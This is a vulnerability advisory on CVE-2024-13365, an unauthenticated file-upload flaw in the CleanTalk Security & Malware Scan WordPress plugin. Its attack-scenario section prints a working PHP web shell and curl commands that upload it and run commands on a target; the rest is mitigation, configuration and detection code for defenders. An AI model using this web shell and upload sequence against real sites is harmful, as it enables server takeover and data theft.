Complete Guide to CVE-2024-13365: Critical WordPress Vulnerability in CleanTalk Plugin

CVE-2024-13365 is a critical vulnerability affecting the Security & Malware Scan by CleanTalk WordPress plugin. This flaw allows unauthenticated attackers to upload arbitrary files to the server, potentially leading to remote code execution (RCE). The vulnerability is due to improper validation of uploaded files, particularly within the checkUploadedArchive() function, making it a severe security threat.

  • CVE ID: CVE-2024-13365
  • CVSS Score: 9.8 (Critical)
  • Affected Plugin: Security & Malware Scan by CleanTalk
  • Affected Versions: Up to and including version 2.149
  • Fixed Version: 2.150
  • Impact: Remote Code Execution (RCE) via arbitrary file upload
  • Patch Release Date: February 2024

Technical Details

The vulnerability exists because the plugin’s malware scanning feature allows users to upload ZIP files for scanning. However, due to inadequate input validation, an attacker can craft a malicious ZIP archive containing a PHP backdoor and upload it without authentication. When extracted, this PHP script can be accessed and executed remotely.
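As an added illustration (not the plugin's code, which this page does not reproduce), the kind of pre-extraction check an upload handler needs: every archive entry is inspected for executable extensions and path traversal before anything is written to disk. The blocked-extension list and the size limits are assumptions for this example.

```python
import io
import posixpath
import zipfile

# Entry types that must never be extracted from an uploaded scan archive.
# Assumed list for this example; the plugin's own rules are not on the page.
BLOCKED_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "phar", "htaccess"}
MAX_ENTRIES = 1000
MAX_UNCOMPRESSED_BYTES = 50 * 1024 * 1024


def validate_scan_archive(data: bytes) -> list[str]:
    """Return the reasons the archive must be rejected (empty list = accept)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid ZIP archive"]
    problems = []
    with zf:
        infos = zf.infolist()
        # Basic zip-bomb limits, checked before any entry is read.
        if len(infos) > MAX_ENTRIES:
            problems.append(f"too many entries ({len(infos)})")
        total = sum(i.file_size for i in infos)
        if total > MAX_UNCOMPRESSED_BYTES:
            problems.append(f"uncompressed size {total} exceeds limit")
        for info in infos:
            name = info.filename.replace("\\", "/")
            norm = posixpath.normpath(name)
            # Reject absolute paths and any "../" component (zip-slip).
            if name.startswith("/") or norm.startswith("..") or "/../" in f"/{name}":
                problems.append(f"path traversal or absolute path: {name}")
            # Check every dotted suffix so "shell.php.txt" and ".htaccess" are caught.
            suffixes = posixpath.basename(norm).lower().split(".")[1:]
            if any(s in BLOCKED_EXTENSIONS for s in suffixes):
                problems.append(f"executable or server-config entry: {name}")
    return problems


def build_zip(entries: dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP from {name: content} (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed archive mirroring the payload.zip of the write-up.
    print(validate_scan_archive(build_zip({"backdoor.php": b"<?php /* constructed */ ?>"})))
    print(validate_scan_archive(build_zip({"notes.txt": b"hello"})))
```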

Attack Scenario: Exploiting CVE-2024-13365

Step 1: Attacker Prepares a Malicious Payload

The attacker creates a backdoor.php file containing a simple web shell:

<?php
if(isset($_GET['cmd'])) {
    echo "<pre>";
    $cmd = ($_GET['cmd']);
    system($cmd);
    echo "</pre>";
}
?>

This script allows the attacker to execute commands on the server remotely via a URL.

Step 2: The Attacker Compresses the Malicious File into a ZIP

zip payload.zip backdoor.php

Step 3: Uploading the Malicious File

Using curl, the attacker sends a POST request to the vulnerable CleanTalk plugin’s AJAX handler:

curl -X POST "https://example.com/wp-admin/admin-ajax.php?action=cleantalk_scan_upload" \
  -F "[email protected]" \
  -H "Content-Type: multipart/form-data"

If the site is vulnerable, the ZIP file is extracted, and backdoor.php is placed in:

/wp-content/uploads/2024/02/backdoor.php

Step 4: Remote Execution of Commands

Once the file is uploaded, the attacker executes commands remotely:

curl "https://example.com/wp-content/uploads/2024/02/backdoor.php?cmd=whoami"

✅ Output:

www-data

🔴 The attacker now has full control of the WordPress site!

Impact of CVE-2024-13365

A successful exploit allows an attacker to:

  • Gain full administrative access to the WordPress site.
  • Modify or delete critical files and databases.
  • Inject malicious scripts for phishing or malware distribution.
  • Turn the website into a botnet for further attacks.

Mitigation Strategies

1️⃣ Immediate Plugin Update

🚀 Update the CleanTalk plugin to version 2.150+ immediately.

  • Navigate to WordPress Admin > Plugins > Installed Plugins
  • Locate Security & Malware Scan by CleanTalk and update it.

2️⃣ Restrict Access to admin-ajax.php

Since admin-ajax.php is publicly accessible, restricting it to authenticated users (or to trusted addresses) can prevent unauthorized file uploads; be aware that any front-end feature which calls admin-ajax.php for anonymous visitors will stop working.

Apache Configuration (Require valid-user needs an authentication provider, so AuthType and AuthUserFile are set here; the .htpasswd path is a placeholder):

<FilesMatch "admin-ajax\.php$">
    AuthType Basic
    AuthName "Restricted"
    AuthUserFile /path/to/.htpasswd
    Require valid-user
</FilesMatch>

NGINX Configuration:

location ~* /wp-admin/admin-ajax\.php$ {
    allow 192.168.1.0/24;
    deny all;
    # Still hand the request to PHP-FPM (socket path is a placeholder); without this nginx would serve the script source.
    include fastcgi_params;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    fastcgi_pass unix:/run/php/php-fpm.sock;
}

3️⃣ Disable Execution of PHP in Uploads Folder

🚀 To prevent execution of uploaded PHP files, add the following to the .htaccess file in /wp-content/uploads/ (this requires Apache with AllowOverride enabled for that directory):

<FilesMatch "\.(php|phtml|php3|php4|php5)$">
    # Apache 2.2 directives; on Apache 2.4 without mod_access_compat use "Require all denied"
    Order Allow,Deny
    Deny from all
</FilesMatch>

4️⃣ Implement a Web Application Firewall (WAF)

A WAF can block unauthorized file uploads and suspicious requests.


5️⃣ Scan for Indicators of Compromise (IoCs)

🔎 Run the following command to detect unknown PHP files in /wp-content/uploads/:

find /var/www/html/wp-content/uploads/ -type f -name "*.php"

If any unexpected PHP files appear, immediately remove them and investigate further.
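Added example, not from the original post: the same hunt applied to the web server access log, which complements the find command above by showing when an upload happened and from where. The log lines are constructed, and the admin-ajax action name is the one this write-up uses.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format; the constructed sample below uses it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
UPLOAD_ACTION = "cleantalk_scan_upload"  # AJAX action named in the write-up
UPLOADS_PHP = re.compile(r"^/wp-content/uploads/.*\.ph(p\d?|tml|ar)$", re.I)


def hunt(lines):
    """Return (ip, timestamp, reason) findings for CVE-2024-13365-style activity."""
    findings = []
    uploaders = set()  # IPs seen hitting the upload action, to correlate later hits
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        ip, ts, method, url, status = m.group("ip", "ts", "method", "url", "status")
        parts = urlsplit(url)
        query = parse_qs(parts.query)
        if method == "POST" and parts.path.endswith("/wp-admin/admin-ajax.php") \
                and UPLOAD_ACTION in query.get("action", []):
            uploaders.add(ip)
            findings.append((ip, ts, "POST to scan-upload AJAX action"))
        elif UPLOADS_PHP.match(parts.path):
            reason = "request for PHP file under wp-content/uploads"
            if "cmd" in query:
                reason += " with cmd= parameter (web shell use)"
            if ip in uploaders:
                reason += "; same IP earlier hit the upload action"
            if status.startswith("2"):
                reason += "; server returned " + status
            findings.append((ip, ts, reason))
    return findings


# Constructed sample log lines (not from a real incident).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Feb/2024:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=cleantalk_scan_upload HTTP/1.1" 200 57 "-" "curl/8.4.0"
203.0.113.5 - - [12/Feb/2024:10:01:09 +0000] "GET /wp-content/uploads/2024/02/backdoor.php?cmd=whoami HTTP/1.1" 200 18 "-" "curl/8.4.0"
198.51.100.7 - - [12/Feb/2024:10:02:00 +0000] "GET /wp-content/uploads/2024/02/photo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Feb/2024:10:02:30 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, ts, reason in hunt(SAMPLE_LOG):
        print(f"{ts} {ip}: {reason}")
```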

6️⃣ Change Admin Credentials and Enable 2FA

  • Immediately reset all admin passwords
  • Check for unauthorized admin accounts
  • Enable Two-Factor Authentication (2FA) for all administrators

Final Recommendations

Action                                            Status
Update Plugin to v2.150+                          ✅
Restrict admin-ajax.php to authenticated users    ✅
Block PHP execution in uploads/                   ✅
Implement a Web Application Firewall (WAF)        ✅
Scan and remove any unauthorized files            ✅
Change passwords and enable 2FA                   ✅

Conclusion

CVE-2024-13365 is a severe security vulnerability that allows unauthenticated attackers to gain full control of vulnerable WordPress sites through arbitrary file uploads. Simply setting a password on /wp-admin/ is not sufficient, as admin-ajax.php remains accessible to the public.

🚀 To fully mitigate this risk:

  • Update the plugin immediately.
  • Restrict access to admin-ajax.php.
  • Prevent execution of PHP files in /uploads/.
  • Use a Web Application Firewall (WAF).

By taking these security measures, WordPress administrators can protect their sites from potential exploitation and ensure their website remains secure against future threats.